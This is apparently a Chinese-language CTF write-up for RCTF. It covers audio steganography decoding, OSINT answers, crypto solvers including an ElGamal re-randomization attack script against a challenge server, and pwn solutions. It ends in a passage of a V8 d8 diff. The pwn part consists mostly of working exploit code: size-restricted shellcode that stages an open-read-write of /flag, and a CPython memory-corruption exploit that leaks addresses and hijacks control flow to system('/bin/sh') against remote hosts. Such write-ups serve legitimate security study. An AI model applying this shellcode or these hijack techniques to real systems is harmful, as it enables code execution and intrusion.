16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/env python3
"""
Simplified script to extract hidden bits from Feel.flac and decode ASCII.
Assumes best alignment: offset=0, MSB-first.
"""

import numpy as np
import soundfile as sf
from scipy.signal import decimate
from sklearn.cluster import KMeans

def load_audio(path):
data, sr = sf.read(path)
if data.ndim > 1:
data = np.mean(data, axis=1)
return data, sr

def envelope(signal, sr, win_ms=5):
abs_sig = np.abs(signal)
win = max(1, int(win_ms * sr / 1000.0))
kernel = np.ones(win) / win
return np.convolve(abs_sig, kernel, mode='same')

def downsample(arr, sr, target_rate=2000):
ds_factor = max(1, int(sr / target_rate))
if ds_factor == 1:
return arr, 1
return decimate(arr, ds_factor), ds_factor

def cluster_2levels(vals):
vals_reshaped = vals.reshape(-1,1)
km = KMeans(n_clusters=2, random_state=0).fit(vals_reshaped)
centers = km.cluster_centers_.flatten()
high_label = int(np.argmax(centers))
labels = (km.labels_ == high_label).astype(int)
return labels

def run_lengths(labels):
runs = []
cur = labels[0]
cnt = 1
for x in labels[1:]:
if x == cur:
cnt += 1
else:
runs.append((cur, cnt))
cur = x
cnt = 1
runs.append((cur, cnt))
return runs

def expand_runs_to_bits(runs, unit):
bits = []
for val, cnt in runs:
repeats = max(1, int(round(cnt / unit)))
bits.extend([val] * repeats)
return bits

def bits_to_bytes(bits):
ba = bytearray()
for i in range(len(bits)//8):
chunk = bits[i*8:(i+1)*8]
val = sum((chunk[j] << (7-j)) for j in range(8)) # MSB-first
ba.append(val)
return bytes(ba)

def main(path):
data, sr = load_audio(path)
env = envelope(data, sr, win_ms=5)
env_ds, _ = downsample(env, sr, target_rate=2000)
labels = cluster_2levels(env_ds)
runs = run_lengths(labels)
unit = min(cnt for _, cnt in runs) # use minimal run length as unit
bits = expand_runs_to_bits(runs, unit)
decoded = bits_to_bytes(bits)
text = decoded.decode('utf-8', errors='replace')
print(text)

if __name__ == "__main__":
main(r"C:\Users\antho\Desktop\Feel.flac")

challenge2: I Feel Fantastic heyheyhey

接下来搜索得到:

challenge3:rLy-AwdCOmI 2009‑04‑15 Creepyblog

img

challenge4: https://androidworld.com/prod68.htm Chris Willis 2004

img

img

challenge5: https://www.findagrave.com/memorial/63520325/john-louis-bergeron

img

最终flag:RCTF{sh3_ju5t_f33ls_l0v3_thr0ugh_w1r3s_4nd_t1m3}

The Alchemist’s Cage

img

img

Crypto

Suanp0l1

多项式提升p = lift(hint)

egcd(m, p)=(a_k, t_k)

a_k ≡ t_k · p (mod m),计算w(a_k)和w(t_k),筛选出权重较小的(接近41)

(X^j*p不改变汉明重量,加法降低汉明重量)

$$a = a_k + X^j · a_{k-1},b = t_k + X^j · t_{k-1} $$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
from sage.all import *
from Crypto.Cipher import AES
from hashlib import md5
import sys

# 参数设置
POLY_DEGREE = 16381
FIELD = GF(2)
POLY_RING = PolynomialRing(FIELD, 'X') # 改为大写X以匹配输入
X = POLY_RING.gen()
MODULUS_POLY = X**POLY_DEGREE - 1

def extract_polynomial_coeffs(poly_string):
"""从字符串中提取多项式系数"""
polynomial = POLY_RING.zero()
# 清理字符串并分割项
terms = poly_string.replace(' ', '').split('+')

for term in terms:
if not term:
continue
if term == '1':
polynomial += 1
elif term == 'X':
polynomial += X
elif term.startswith('X^'):
try:
power = int(term[2:])
polynomial += X**power
except ValueError:
raise ValueError(f"无法解析指数: {term}")
else:
# 调试信息
print(f"警告: 未知项格式 '{term}',尝试跳过")
continue

return polynomial

def generate_poly_string_from_exponents(exponent_list):
"""从指数列表生成多项式字符串"""
components = []
for exp in sorted(exponent_list, reverse=True):
if exp == 0:
components.append('1')
elif exp == 1:
components.append('X')
else:
components.append(f'X^{exp}')
return ' + '.join(components) if components else '0'

def find_denominator_poly(quotient_poly):
"""通过有理重建找到分母多项式"""
numerator_bound = 2 * POLY_DEGREE // 3
denominator_bound = POLY_DEGREE // 3

print(f"开始有理重建...")
print(f"分子边界: {numerator_bound}, 分母边界: {denominator_bound}")

try:
numerator_poly, denominator_poly = quotient_poly.rational_reconstruction(
MODULUS_POLY, numerator_bound, denominator_bound
)

print(f"重建成功!")
print(f"分子度数: {numerator_poly.degree()}")
print(f"分母度数: {denominator_poly.degree()}")

denominator_exponents = sorted(monomial.degree() for monomial in denominator_poly.monomials())
print(f"找到分母指数: {denominator_exponents[:10]}... (共{len(denominator_exponents)}项)")

return denominator_exponents

except Exception as e:
print(f"有理重建失败: {e}")
raise

def attempt_flag_recovery(denominator_exponents, encrypted_data_hex):
"""尝试恢复flag"""
encrypted_bytes = bytes.fromhex(encrypted_data_hex.strip())
initialization_vector = b'suanp01y'

print(f"开始暴力破解循环移位,共{POLY_DEGREE}种可能...")
print(f"初始分母指数: {denominator_exponents[:10]}...")

for rotation in range(POLY_DEGREE):
if rotation % 1000 == 0:
print(f"尝试移位: {rotation}/{POLY_DEGREE}")

rotated_exponents = [(exp + rotation) % POLY_DEGREE for exp in denominator_exponents]
poly_representation = generate_poly_string_from_exponents(rotated_exponents)

encryption_key = md5(poly_representation.encode()).digest()
aes_cipher = AES.new(encryption_key, AES.MODE_CTR, nonce=initialization_vector)

try:
decrypted_data = aes_cipher.decrypt(encrypted_bytes)
if decrypted_data.startswith(b'RCTF{'):
print(f'\n成功! 旋转量: {rotation}')
print(f'Flag: {decrypted_data.decode()}')
return decrypted_data.decode()
except:
continue

raise RuntimeError('未找到flag')

def execute_solution(file_path):
"""执行解题流程"""
print(f"读取文件: {file_path}")

with open(file_path, 'r') as file:
content_lines = [line.strip() for line in file if line.strip()]

if len(content_lines) < 2 or not content_lines[0].startswith('hint = '):
raise ValueError('文件格式不符合预期')

hint_expression = content_lines[0].split('hint = ', 1)[1]
ciphertext_data = content_lines[1]

print(f"Hint表达式长度: {len(hint_expression)}")
print(f"密文长度: {len(ciphertext_data)}")

# 显示部分hint用于调试
hint_preview = hint_expression[:100] + "..." if len(hint_expression) > 100 else hint_expression
print(f"Hint预览: {hint_preview}")

hint_polynomial = extract_polynomial_coeffs(hint_expression)
print(f"多项式解析成功,度数: {hint_polynomial.degree()}")

denominator_exponents = find_denominator_poly(hint_polynomial)

return attempt_flag_recovery(denominator_exponents, ciphertext_data)

if __name__ == '__main__':
input_file = sys.argv[1] if len(sys.argv) > 1 else 'output.txt'
try:
result = execute_solution(input_file)
print(f"\n解题完成: {result}")
except Exception as e:
print(f"错误: {e}")
import traceback
traceback.print_exc()

RePairing

多次交互测得flag的长度为83

  • block0 = SHA256(…, ctr=0) 取 32 字节
  • block1 = SHA256(…, ctr=1) 取 32 字节
  • block2 = SHA256(…, ctr=2) 取前 19 字节

elgamal重随机化攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
use ark_bls12_381::{Bls12_381, Fr, G1Affine, G1Projective, G2Affine, G2Projective};
use ark_ec::{pairing::Pairing, CurveGroup, PrimeGroup, AffineRepr};
use ark_ff::{Field, One, PrimeField};
use ark_serialize::{CanonicalDeserialize, CanonicalSerialize, Compress, Validate};
use tokio::io::{AsyncReadExt, AsyncWriteExt, BufReader, AsyncBufReadExt};
use tokio::net::TcpStream;

type Gt = <Bls12_381 as Pairing>::TargetField;

fn parse_gt(s: &str) -> Result<Gt, ()> {
let bytes = hex::decode(s).map_err(|_| ())?;
let mut reader = &bytes[..];
let gt = Gt::deserialize_with_mode(&mut reader, Compress::Yes, Validate::Yes).map_err(|_| ())?;
Ok(gt)
}

fn parse_g1(s: &str) -> Result<G1Projective, ()> {
let bytes = hex::decode(s).map_err(|_| ())?;
let a = G1Affine::deserialize_with_mode(&*bytes, Compress::Yes, Validate::Yes).map_err(|_| ())?;
Ok(G1Projective::from(a))
}

fn parse_g2(s: &str) -> Result<G2Projective, ()> {
let bytes = hex::decode(s).map_err(|_| ())?;
let a = G2Affine::deserialize_with_mode(&*bytes, Compress::Yes, Validate::Yes).map_err(|_| ())?;
Ok(G2Projective::from(a))
}

fn hex_gt(x: &Gt) -> String {
let mut v = Vec::new();
x.serialize_with_mode(&mut v, Compress::Yes).unwrap();
hex::encode(v)
}

fn hex_g1(p: &G1Projective) -> String {
let a: G1Affine = (*p).into_affine();
let mut v = Vec::new();
a.serialize_with_mode(&mut v, Compress::Yes).unwrap();
hex::encode(v)
}

fn hex_g2(p: &G2Projective) -> String {
let a: G2Affine = (*p).into_affine();
let mut v = Vec::new();
a.serialize_with_mode(&mut v, Compress::Yes).unwrap();
hex::encode(v)
}

async fn repairing_submit(t_prime: u64, use_c1_as_t: bool) -> Result<(), Box<dyn std::error::Error>> {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;

let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 {
return Err("bad banner".into());
}

let pk_hex = parts[2].trim();
let h1_hex = parts[3].trim();
let c1_hex = parts[4].trim();
let enc_hex = parts[7].trim();

let pk = parse_gt(pk_hex).map_err(|_| "pk" )?;
let h1_id = parse_g2(h1_hex).map_err(|_| "h1" )?;
let c1 = parse_gt(c1_hex).map_err(|_| "c1" )?;
let enc = hex::decode(enc_hex)?;

let t_fr = Fr::from(t_prime);
let c2p = G1Projective::generator() * t_fr;
let c3p = h1_id * t_fr;

let t_pow = pk.pow(t_fr.into_bigint());
let t_gt = if use_c1_as_t { c1 } else { Gt::one() };
let c1p = t_gt * t_pow;

let payload = format!(
"{}|{}|{}\n",
hex_gt(&c1p),
hex_g1(&c2p),
hex_g2(&c3p)
);

reader.get_mut().write_all(payload.as_bytes()).await?;
reader.get_mut().flush().await?;

let mut out = Vec::new();
let mut kbuf = [0u8; 4096];
let m = reader.get_mut().read(&mut kbuf).await?;
out.extend_from_slice(&kbuf[..m]);
let kdf_hex = String::from_utf8_lossy(&out).trim().to_string();
let kdf = hex::decode(&kdf_hex)?;

let flag: Vec<u8> = enc.iter().zip(kdf.iter()).map(|(a,b)| a ^ b).collect();
println!("{}", String::from_utf8_lossy(&flag));
Ok(())
}

async fn read_banner() -> Result<String, Box<dyn std::error::Error>> {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;
Ok(banner)
}

async fn send_once(payload: String) -> Result<String, Box<dyn std::error::Error>> {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;
reader.get_mut().write_all(payload.as_bytes()).await?;
reader.get_mut().flush().await?;
let mut resp = String::new();
reader.read_line(&mut resp).await?;
Ok(resp.trim().to_string())
}

async fn run_bad_tests() -> Result<(), Box<dyn std::error::Error>> {
let banner = read_banner().await?;
let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 { return Err("bad banner".into()); }
let c1_hex = parts[4].trim();
let c2_hex = parts[5].trim();
let c3_hex = parts[6].trim();

let g1_zero_hex = {
let mut v = Vec::new();
G1Affine::zero().serialize_with_mode(&mut v, Compress::Yes).unwrap();
hex::encode(v)
};
let g2_zero_hex = {
let mut v = Vec::new();
G2Affine::zero().serialize_with_mode(&mut v, Compress::Yes).unwrap();
hex::encode(v)
};

let cases = vec![
("too_few_parts", format!("{}|{}\n", c1_hex, c2_hex)),
("too_many_parts", format!("{}|{}|{}|extra\n", c1_hex, c2_hex, c3_hex)),
("parse_gt_error", format!("zz|{}|{}\n", c2_hex, c3_hex)),
("parse_g1_error", format!("{}|zz|{}\n", c1_hex, c3_hex)),
("parse_g2_error", format!("{}|{}|zz\n", c1_hex, c2_hex)),
("zero_g1", format!("{}|{}|{}\n", c1_hex, g1_zero_hex, c3_hex)),
("zero_g2", format!("{}|{}|{}\n", c1_hex, c2_hex, g2_zero_hex)),
];

for (name, payload) in cases {
let resp = send_once(payload).await.unwrap_or_else(|e| format!("err:{e}"));
println!("{} => {}", name, resp);
}
Ok(())
}

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let args: Vec<String> = std::env::args().collect();
if args.get(1).map(|s| s == "bad").unwrap_or(false) {
run_bad_tests().await?;
} else if args.get(1).map(|s| s == "prefix").unwrap_or(false) {
let max_r: u64 = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(100);
prefix_scan(max_r).await?;
} else if args.get(1).map(|s| s == "len").unwrap_or(false) {
let times: u64 = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(5);
measure_flag_len(times).await?;
} else if args.get(1).map(|s| s == "pow").unwrap_or(false) {
let max_r: u64 = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(32);
pow_scan(max_r).await?;
} else if args.get(1).map(|s| s == "rerand").unwrap_or(false) {
let r: u64 = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(1);
rerand_attack(r).await?;
} else {
let t_prime: u64 = args.get(1).and_then(|s| s.parse().ok()).unwrap_or(2);
let use_c1_as_t = args.get(2).map(|s| s == "use_c1").unwrap_or(false);
repairing_submit(t_prime, use_c1_as_t).await?;
}
Ok(())
}

async fn prefix_scan(max_r: u64) -> Result<(), Box<dyn std::error::Error>> {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;

let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 { return Err("bad banner".into()); }
let pk_hex = parts[2].trim();
let h1_hex = parts[3].trim();
let c1_hex = parts[4].trim();
let enc_hex = parts[7].trim();

let pk = parse_gt(pk_hex).map_err(|_| "pk" )?;
let h1_id = parse_g2(h1_hex).map_err(|_| "h1" )?;
let c1 = parse_gt(c1_hex).map_err(|_| "c1" )?;
let enc = hex::decode(enc_hex)?;

let known = b"RCTF{";
let n = known.len();
if enc.len() < n { return Err("flag too short".into()); }
let key_prefix_expected: Vec<u8> = enc[..n].iter().zip(known.iter()).map(|(a,b)| a ^ b).collect();

for r in 1..=max_r {
let t_fr = Fr::from(r);
let c2p = G1Projective::generator() * t_fr;
let c3p = h1_id * t_fr;
let u = pk.pow(t_fr.into_bigint());
let u_inv = u.inverse().unwrap();
let c1p = c1 * u_inv;

let payload = format!(
"{}|{}|{}\n",
hex_gt(&c1p),
hex_g1(&c2p),
hex_g2(&c3p)
);

reader.get_mut().write_all(payload.as_bytes()).await?;
reader.get_mut().flush().await?;

let mut resp = String::new();
reader.read_line(&mut resp).await?;
let kdf_hex = resp.trim().to_string();
let kdf = match hex::decode(&kdf_hex) { Ok(v) => v, Err(_) => continue };
if kdf.len() < n { continue; }
if &kdf[..n] == key_prefix_expected.as_slice() {
let flag: Vec<u8> = enc.iter().zip(kdf.iter()).map(|(a,b)| a ^ b).collect();
println!("{}", String::from_utf8_lossy(&flag));
return Ok(())
}
}

println!("no match in range");
Ok(())
}

async fn measure_flag_len(times: u64) -> Result<(), Box<dyn std::error::Error>> {
let mut lens = Vec::new();
for _ in 0..times {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;
let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 { continue; }
let enc_hex = parts[7].trim();
let enc = match hex::decode(enc_hex) { Ok(v) => v, Err(_) => continue };
println!("len={}", enc.len());
lens.push(enc.len());
}
if !lens.is_empty() {
let first = lens[0];
if lens.iter().all(|&x| x == first) {
println!("consensus_len={}", first);
} else {
println!("lengths={:?}", lens);
}
}
Ok(())
}

async fn pow_scan(max_r: u64) -> Result<(), Box<dyn std::error::Error>> {
let mut prev: Option<Vec<u8>> = None;
for r in 1..=max_r {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;

let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 { continue; }
let c1_hex = parts[4].trim();
let c2_hex = parts[5].trim();
let c3_hex = parts[6].trim();

let c1 = match parse_gt(c1_hex) { Ok(v) => v, Err(_) => continue };
let c2 = match parse_g1(c2_hex) { Ok(v) => v, Err(_) => continue };
let c3 = match parse_g2(c3_hex) { Ok(v) => v, Err(_) => continue };

let tr = Fr::from(r);
let c1p = c1.pow(tr.into_bigint());
let c2p = c2 * tr;
let c3p = c3 * tr;

let payload = format!(
"{}|{}|{}\n",
hex_gt(&c1p),
hex_g1(&c2p),
hex_g2(&c3p)
);

reader.get_mut().write_all(payload.as_bytes()).await?;
reader.get_mut().flush().await?;

let mut resp = String::new();
reader.read_line(&mut resp).await?;
let kdf_hex = resp.trim().to_string();
let kdf = match hex::decode(&kdf_hex) { Ok(v) => v, Err(_) => continue };

let head = &kdf[..std::cmp::min(16, kdf.len())];
let head_hex = hex::encode(head);
if let Some(prev_bytes) = &prev {
let m = std::cmp::min(prev_bytes.len(), kdf.len());
let mut hd = 0u64;
for i in 0..m {
hd += ((prev_bytes[i] ^ kdf[i]) as u8).count_ones() as u64;
}
println!("r={} head={} hamming_bits={}", r, head_hex, hd);
} else {
println!("r={} head={}", r, head_hex);
}
prev = Some(kdf);
}
Ok(())
}

async fn rerand_attack(r: u64) -> Result<(), Box<dyn std::error::Error>> {
let stream = TcpStream::connect("1.14.196.78:42601").await?;
let mut reader = BufReader::new(stream);
let mut banner = String::new();
reader.read_line(&mut banner).await?;

let parts: Vec<&str> = banner.split('|').collect();
if parts.len() != 8 { return Err("bad banner".into()); }
let pk_hex = parts[2].trim();
let h1_hex = parts[3].trim();
let c1_hex = parts[4].trim();
let c2_hex = parts[5].trim();
let c3_hex = parts[6].trim();
let enc_hex = parts[7].trim();

let pk = parse_gt(pk_hex).map_err(|_| "pk" )?;
let h1_id = parse_g2(h1_hex).map_err(|_| "h1" )?;
let c1 = parse_gt(c1_hex).map_err(|_| "c1" )?;
let c2 = parse_g1(c2_hex).map_err(|_| "c2" )?;
let c3 = parse_g2(c3_hex).map_err(|_| "c3" )?;
let enc = hex::decode(enc_hex)?;

let rf = Fr::from(r);
let c1p = c1 * pk.pow(rf.into_bigint());
let c2p = c2 + (G1Projective::generator() * rf);
let c3p = c3 + (h1_id * rf);

let payload = format!(
"{}|{}|{}\n",
hex_gt(&c1p),
hex_g1(&c2p),
hex_g2(&c3p)
);

reader.get_mut().write_all(payload.as_bytes()).await?;
reader.get_mut().flush().await?;
let mut resp = String::new();
reader.read_line(&mut resp).await?;
let kdf_hex = resp.trim().to_string();
let kdf = hex::decode(&kdf_hex)?;
let flag: Vec<u8> = enc.iter().zip(kdf.iter()).map(|(a,b)| a ^ b).collect();
println!("{}", String::from_utf8_lossy(&flag));
Ok(())
}

Pwn

Only

魔数可以用以下脚本,将十六进制数转换为double。

1
2
3
4
5
import struct
bits=0x0D0E0A0D0B0E0E0F
d=struct.unpack('<d', struct.pack('<Q', bits))[0]
print('decimal:', repr(d))
print('hex_float:', d.hex());

限制字节较为严格的shellcode编写,首先通过call的压栈获得rip的地址,并写入rsi,又因为此时的rax为0,可以进行sys_read,读入更多的shellcode,进行orw。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])
p = process('./chal')
GDBSCRIPT = '''
b *$rebase(0x000000000001A40)
'''
shellcode = asm('''
call next
next:
pop rsi
mov dl, 0xff
syscall
''')
p.sendlineafter(b'3.exit\n', b'2')
p.sendlineafter(b'input:\n', b'1.0880585577140108e-306') # 之前写的/bin/sh字符串,不用管
p.sendline(b'8.592564544313935e-246')
p.sendlineafter(b'Make a choice:', b'1')
p.sendafter(b'your code:', bytes(shellcode))

# orw
shellcode = asm('''
add rsp, 0x8
lea rdi, [rip + 0x38]
mov rsi, 0
mov rdx, 0
mov al, 0x2
syscall

mov rdi, rax
mov rsi, rsp
mov rdx, 0x400
mov al, 0x0
syscall

mov rdi, 0x1
mov rsi, rsp
mov rdx, 0x400
mov al, 0x1
syscall

''')
p.sendline(b'\x90' * 5 + shellcode + b'/flag\x00')

p.interactive()

only_rev

相较于only,这题对第一次的shellcode进行了更严的限制

  1. 长度从10字节压缩为9字节
  2. 将栈整体偏移了0x12345678,使得栈不可读写

由于sys_read(0,0,0)会将rcx赋值为下一条指令的地址,我们可以通过xchg将rsi赋值为此地址,对该地址进行更长的读写,写入shellcode进行orw即可.

这里利用sys_call和xchg获得rip的位置,比上一题的方法短了1字节。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])
# p = process('./chal')
p = remote('1.95.164.64', 26000)
GDBSCRIPT = '''
b *$rebase(0x000000000001A79)
'''
# gdb.attach(p, GDBSCRIPT)
shellcode = asm('''
syscall
xchg rcx, rsi
mov dl, 0xff
syscall
''')
p.sendlineafter(b'3.exit\n', b'2')
p.sendlineafter(b'input:\n', b'1.0880585577140108e-306')
p.sendline(b'8.592564544313935e-246')
p.sendlineafter(b'Make a choice:', b'1')
p.sendafter(b'your code:', bytes(shellcode))

# orw
shellcode = asm('''
sub rsp, 0x12345670
lea rdi, [rip + 0x38]
mov rsi, 0
mov rdx, 0
mov al, 0x2
syscall

mov rdi, rax
mov rsi, rsp
mov rdx, 0x400
mov al, 0x0
syscall

mov rdi, 0x1
mov rsi, rsp
mov rdx, 0x400
mov al, 0x1
syscall

''')
p.sendline(b'\x90' * 7 + shellcode + b'/flag\x00')

p.interactive()

Mstr

CPython中,对于单字节ascii字符有缓存,new(‘9’)和set_max(‘9’)的’9’都指向同一个对象,因此可以构造大的max_size,造成溢出。

最终劫持rip参考的是ductf2025的fakeobj

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0
script_path = os.path.dirname(__file__) + '/mstr.py'
os.chdir(os.path.dirname(__file__) + '/Python-3.12.4')

gift.elf = ELF(elf_path := './python_build')
if local_flag == "remote":
addr = '1.95.190.154 26001'
ip, port = re.split(r'[\s:]+', addr)
gift.io = remote(ip, port)
else:
gift.io = process([elf_path, script_path])
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc('./libc.so.6')

def new(data):
if isinstance(data, str):
data = data.encode()
sla(b'> ', b'new ' + data)

def set_max(idx, size):
sla(b'> ', b'set_max ' + str(size).encode() + b' ' + str(idx).encode())

def add(idx1, idx2):
sla(b'> ', b'+ ' + str(idx1).encode() + b' ' + str(idx2).encode())

def addeq(idx1, idx2):
sla(b'> ', b'+= ' + str(idx1).encode() + b' ' + str(idx2).encode())

def print_max(idx):
sla(b'> ', b'print_max ' + str(idx).encode())

def print_data(idx):
sla(b'> ', b'print ' + str(idx).encode())

def modify(idx, offset, val):
if isinstance(val, int):
val = p8_ex(val)
sla(b'> ', b'modify ' + str(idx).encode() + b' ' + str(offset).encode() + b' ' + str(u8_ex(val)).encode())

def debug(idx):
sla(b'> ', b'debug ' + str(idx).encode())

cmd = '''
source ./python-gdb.py
dir ./
# b PyCData_set
b _PyCData_set
b *_PyEval_EvalFrameDefault+1728
c
'''

new('9')
new('A' * 0x200)
new('A' * 0x200)
new('A' * 0x200)
new('A' * 0x200)
set_max(2, 9)
new('999999')
addeq(0, 5)
new('B' * 0x2E)
addeq(2, 6)
modify(3, 0x228, 0xC0)
modify(3, 0x229, 0x2)
print_data(4)
ru(b'A' * 0x200)
leak_data = r(0xC0)
mem_addr = u64_ex(leak_data[0x20:0x28]) - 0x1769E0
code_base = u64_ex(leak_data[0x58:0x60]) - gift.elf.sym.subtype_dealloc
heap_base = u64_ex(leak_data[0x78:0x80]) + 0x540
cpylibc_base = u64_ex(leak_data[0xA0:0xA8]) - 0x7A50
leak_ex2(mem_addr)
set_current_code_base_and_log(code_base)
leak_ex2(heap_base)
leak_ex2(cpylibc_base)
modify(3, 0x229, 0xD)
new('A' * 0x200)
payload = flat(
{
0x0: b'-bin/sh\x00',
0x8: heap_base - 88 + 16,
0x10: gift.elf.sym.system,
},
length=0x48,
filler=b'\x00',
)
for i in range(len(payload)):
modify(4, i + 0x930 - 0x28, payload[i])
launch_gdb(cmd)
# debug(114514)
print_data(7)

ia()

no_check_WASM

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index 478c7cb3c75..b4700b6cab2 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -4213,51 +4213,51 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(

Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
- String::NewFromUtf8Literal(isolate, "global"));
- global_template->Set(isolate, "version",
- FunctionTemplate::New(isolate, Version));
+ // global_template->Set(Symbol::GetToStringTag(isolate),
+ // String::NewFromUtf8Literal(isolate, "global"));
+ // global_template->Set(isolate, "version",
+ // FunctionTemplate::New(isolate, Version));

global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
- global_template->Set(isolate, "printErr",
- FunctionTemplate::New(isolate, PrintErr));
- global_template->Set(isolate, "write",
- FunctionTemplate::New(isolate, WriteStdout));
- if (!i::v8_flags.fuzzing) {
- global_template->Set(isolate, "writeFile",
- FunctionTemplate::New(isolate, WriteFile));
- }
- global_template->Set(isolate, "read",
- FunctionTemplate::New(isolate, ReadFile));
- global_template->Set(isolate, "readbuffer",
- FunctionTemplate::New(isolate, ReadBuffer));
- global_template->Set(isolate, "readline",
- FunctionTemplate::New(isolate, ReadLine));
- global_template->Set(isolate, "load",
- FunctionTemplate::New(isolate, ExecuteFile));
- global_template->Set(isolate, "setTimeout",
- FunctionTemplate::New(isolate, SetTimeout));
- // Some Emscripten-generated code tries to call 'quit', which in turn would
- // call C's exit(). This would lead to memory leaks, because there is no way
- // we can terminate cleanly then, so we need a way to hide 'quit'.
- if (!options.omit_quit) {
- global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
- }
- global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
- global_template->Set(isolate, "performance",
- Shell::CreatePerformanceTemplate(isolate));
- global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-
- // Prevent fuzzers from creating side effects.
- if (!i::v8_flags.fuzzing) {
- global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
- }
- global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
-
